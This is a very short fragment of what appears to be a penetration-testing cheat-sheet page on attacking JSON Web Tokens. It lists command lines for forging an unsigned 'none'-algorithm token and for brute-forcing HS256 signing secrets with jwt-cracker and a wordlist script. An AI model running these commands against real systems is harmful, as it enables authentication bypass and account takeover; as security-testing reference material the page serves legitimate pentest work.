Last updated 4 years ago
Was this helpful?
Decode token:
Get
python3 TheNone.py -t <token>
jwt-cracker "<Token>" "abcdefghijklmnopqrstuwxyz" 6
jwt-cracker <Token> 1234567890 6
python brute-jwt.py --file /usr/share/wordlists/secrets.txt --algorithm HS256 --token <Token>